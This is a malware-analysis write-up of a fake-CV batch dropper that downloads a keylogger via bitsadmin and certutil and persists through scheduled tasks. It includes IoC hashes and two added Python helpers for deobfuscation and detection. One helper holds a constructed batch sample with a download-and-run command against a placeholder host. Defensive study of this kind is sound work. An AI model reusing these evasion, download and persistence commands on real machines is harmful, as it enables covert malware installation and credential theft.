BAT Downloader to Keylogger Technical Analysis — Part 1
Recently I encountered an interesting piece of malware that used multiple techniques to obfuscate itself and drop files to disk. I thought it would be worth doing a quick write-up of the sample and discussing some of the techniques used.
I’ll be splitting this analysis into two parts. In this first one we’ll discuss the initial attack vector and how the malware installs and obfuscates itself on the machine. The second will focus on the two PowerShell scripts that the malware drops in its second stage.
Here are the hashes of the sample for anyone interested in taking a look:
At the time of writing, the sample has only 8/60 detections on VirusTotal.
The malware was being distributed via a Dropbox link. Once downloaded we get a zip file named “CV_YASMINA.PDF .ZIP”.
The zip file uses a double extension to trick the user into thinking it’s a PDF. This is a common technique for Windows malware, as the option to show file extensions is disabled by default.
The zip file contains one file with a “.bat” extension. Again, the bat file uses the double extension technique to trick users into thinking it’s a PDF file.
Let’s extract the bat file and take a look at the code inside.
As you can see, the file seems to be obfuscated in some form and everything appears to be written in Chinese. But if we check the encoding of the file with a command-line tool like “file”, we’ll see that it’s encoded in “UTF-16 LE”.
In VSCode, for example, we can choose the option to reopen the file with a different encoding. We’ll choose “UTF-8” and voilà, the content of the malicious bat file is now readable.
Let’s start our analysis.
“CV_YASMINA.PDF .BAT” Analysis
The bat file is doing a couple of things to trick the user and download its next stage. Let’s go through the techniques used.
First, the malware invokes the “Shows Desktop.lnk” file, which minimizes all windows and shows the desktop. It’s the same as pressing the “Ctrl+M” keyboard shortcut.
It then invokes the “mshta” utility to pop up an error message written in French, which translates to “Unable to read the file. The file type may not be supported, the file extension is incorrect, or the file may be corrupted.” This tricks the user into thinking that something has failed. (Below is the error message.)
Next is the second-stage downloader section. The file checks whether a “test.bat” file already exists in the %temp% directory. If it doesn’t, it proceeds to create multiple variables, named “a” through “j”, each holding a small part of the full command that will download the second stage. Splitting the command across variables like this is done to avoid detection.
If we concatenate all of these variables, we’ll get the following string.
The code above performs the following actions:
- Create a folder named “WindowsNT” in the %temp% directory.
- Start a download with the “bitsadmin” utility and fetch two files. The first is “launcher_kl.txt”, which gets saved as “cert.exe” in the previously created “WindowsNT” directory; the second is “kl_exe.txt”, which gets saved as “certificate_kl.txt” in the same “WindowsNT” directory.
- Execute the freshly downloaded “cert.exe”.
- Create a scheduled task named “Update Manager” that runs every 10 minutes and launches the “cert.exe” file.
All of this is written to a file named “test.bat”, which gets dropped in the %temp% directory and executed.
And just to make sure that the second-stage downloader gets executed no matter what, a scheduled task named “Update Manager” is also created to execute “test.bat” every 10 minutes.
Assuming everything went as planned and the malware successfully downloaded everything, the next thing that gets executed is the freshly downloaded “cert.exe”. That’s the file we’ll be looking at next.
If we first look at the output of the file command on our executable, we’ll see that it’s a PE32 GUI executable with stripped symbols.
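As an added example (not code from the original post), here is a small Python helper that undoes the two tricks just described: it decodes a UTF-16 LE batch file, reassembles a command that was split across `set` variables, and flags the LOLBins used. The embedded batch text is constructed to mimic the dropper (placeholder URL, fewer variables); it is not the real sample.

```python
import re

# Constructed batch text mimicking the dropper (NOT the real sample): UTF-16 LE
# encoded, download command split over variables a..e and reassembled by one echo.
SAMPLE_BAT = "\r\n".join([
    "if not exist %temp%\\test.bat (",
    "set a=md %temp%\\WindowsNT ^& ",
    "set b=bitsadmin /transfer dl /download /priority high ",
    "set c=https://example.invalid/launcher_kl.txt %temp%\\WindowsNT\\cert.exe ^& ",
    'set d=schtasks /create /sc minute /mo 10 /tn "Update Manager" ',
    "set e=/tr %temp%\\WindowsNT\\cert.exe",
    "echo %a%%b%%c%%d%%e% > %temp%\\test.bat",
    ")",
]).encode("utf-16-le")

# LOLBin patterns the write-up walks through; the labels are ours.
INDICATORS = [
    (r"bitsadmin\s+/transfer", "BITS download"),
    (r"schtasks\s+/create.*/mo\s+10", "scheduled task every 10 min"),
    (r"certutil.*-decode", "certutil base64 decode"),
]

def decode_batch(raw: bytes) -> str:
    """Decode a .bat hidden behind UTF-16 LE, with or without a BOM."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le")
    # No BOM: UTF-16 LE ASCII text has a NUL in every odd byte position.
    if raw and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")

def collect_variables(text: str) -> dict:
    """Harvest 'set name=value' lines (batch variable names are case-insensitive)."""
    pat = re.compile(r"^\s*set\s+([A-Za-z_]\w*)=(.*)$", re.I | re.M)
    return {m.group(1).lower(): m.group(2).rstrip("\r") for m in pat.finditer(text)}

def expand_line(line: str, variables: dict) -> str:
    """Substitute %var% references; unknown ones (e.g. %temp%) are left as-is."""
    return re.sub(r"%(\w+)%", lambda m: variables.get(m.group(1).lower(), m.group(0)), line)

def analyze(raw: bytes) -> dict:
    """Rebuild every non-'set' line that uses %vars% and scan the result."""
    text = decode_batch(raw)
    variables = collect_variables(text)
    rebuilt = [expand_line(l, variables) for l in text.splitlines()
               if re.search(r"%\w+%", l) and not re.match(r"\s*set\s", l, re.I)]
    hits = [label for rx, label in INDICATORS if re.search(rx, "\n".join(rebuilt), re.I)]
    return {"variables": len(variables), "rebuilt": rebuilt, "hits": hits}
```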
Next, let’s check whether it contains any interesting strings by running the “strings” command on it.
BINGO. As you can see, the strings contain what looks like a WMI command and some PowerShell. Let’s beautify this, put it into a nice editor and start analyzing.
In a nutshell, the following code decodes the previously downloaded “certificate_kl.txt”, stored in the “WindowsNT” folder under the temp directory, using the “certutil” utility with the “-decode” flag, which decodes a base64-encoded file.
The decoded file is of type “Microsoft Cabinet archive data”, or “CAB” file for short (i.e. compressed). The next thing the malware does is the decompression routine, which consists of running the “EXPAND” command.
The newly obtained PowerShell file is the final stage (or so I thought); it contains a “Keylogger” written in C#, which I’ll be analyzing in Part 2.
The final step before executing the PowerShell script is obfuscation. The malware author created a quick obfuscation routine to change the names of some of the functions inside the script. It uses simple replace methods and some randomization to replace each function name with a set of random characters.
Finally, the script gets executed and the original encoded file “certificate_kl.txt” is deleted.
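As an added example (not from the post or the malware), the following Python detection groups process-creation events by parent and flags a parent that spawns the certutil -decode / EXPAND / PowerShell-from-temp chain described above. The events, PIDs, user path, .cab name and command-line switches are constructed; only the file names come from the write-up.

```python
import re

# Constructed process-creation events (Sysmon-like fields) modelling the cert.exe
# stage; PIDs, the user path, the .cab name and the switches are made up.
TMP = r"C:\Users\victim\AppData\Local\Temp\WindowsNT"
EVENTS = [
    {"pid": 400, "ppid": 100, "cmd": TMP + r"\cert.exe"},
    {"pid": 401, "ppid": 400, "cmd": f"certutil -decode {TMP}\\certificate_kl.txt {TMP}\\kl.cab"},
    {"pid": 402, "ppid": 400, "cmd": f"expand {TMP}\\kl.cab {TMP}\\windows_activator.ps1"},
    {"pid": 403, "ppid": 400, "cmd": f"powershell -ep bypass -File {TMP}\\windows_activator.ps1"},
    {"pid": 500, "ppid": 100, "cmd": r"certutil -verify C:\certs\root.cer"},  # benign admin use
]

# Each stage of the chain described in the write-up, as a case-insensitive regex.
STAGES = [
    ("certutil_decode", r"\bcertutil(\.exe)?\b.*\s-decode\s"),
    ("expand_cab", r"\bexpand(\.exe)?\s.*\.cab\b"),
    ("powershell_from_temp", r"\bpowershell(\.exe)?\b.*\\temp\\.*\.ps1\b"),
]

def classify(cmd):
    """Return the stage name a command line belongs to, or None."""
    for name, rx in STAGES:
        if re.search(rx, cmd, re.I):
            return name
    return None

def find_decode_chains(events, min_stages=2):
    """Group stage hits by parent PID; a parent whose children cover at least
    min_stages distinct stages is returned with its sorted stage list."""
    by_parent = {}
    for ev in events:
        stage = classify(ev["cmd"])
        if stage:
            by_parent.setdefault(ev["ppid"], set()).add(stage)
    return {ppid: sorted(st) for ppid, st in by_parent.items() if len(st) >= min_stages}

def decoded_inputs(events):
    """List the files handed to certutil -decode, to grab the encoded payload for triage."""
    out = []
    for ev in events:
        m = re.search(r"-decode\s+(\S+)", ev["cmd"], re.I)
        if m:
            out.append(m.group(1))
    return out
```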
Before we conclude this first part of our analysis, let’s do a quick recap of what the malware did and which techniques were used.
- The malware disguises itself as a PDF file inside a ZIP file named “CV_YASMINA” to trick users into thinking it’s a CV (Curriculum Vitae).
- The ZIP file contains a malicious bat file that obfuscates its contents by using UTF-16 LE encoding and multiple variable names to split up the commands being executed.
- When executed, it shows an error message to trick users into thinking that something went wrong.
- It downloads two files (“cert.exe” and “certificate_kl.txt”) into the temp directory. Notice that the original files on Dropbox have a “.txt” extension, which adds a small layer of obfuscation, as “txt” files are sometimes ignored during log analysis.
- It creates two scheduled tasks to make sure that the second stage gets downloaded and executed no matter what.
- Once the second stage is downloaded, the malware proceeds to execute “cert.exe”, which decodes and creates the “final” payload.
Indicators of Compromise (IoCs)
- CV_YASMINA.PDF .zip: dd03221a35480c483c86195956ebb5d094c3e875c5f18f2d6e95a7dc32db78a9
- CV_YASMINA.PDF .bat: dd42edae0008019aac47cee7962f564f1c201a232fe62f269b485e8e6332e498
- launcher_kl.txt / cert.exe: cf7fc1e176f3931bfbb508ddeb1b24b79f3db166ff1739cff69bee4d7f5d5a6a
- kl_exe.txt / certificate_kl.txt: 1dd960fad2a8d057d32a9889e1f6a7c1349697d7df0fee2bc08d39709c443bd4
- windows_activator.ps1 (After Obfuscation):
I hope you enjoyed this quick analysis and learned something along the way. See you in part 2, hopefully very soon.
If you have any feedback or suggestions, please send them my way @nas_bench